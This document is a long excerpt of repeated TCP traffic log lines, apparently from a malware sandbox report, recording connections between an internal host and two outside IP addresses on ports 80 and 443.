                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
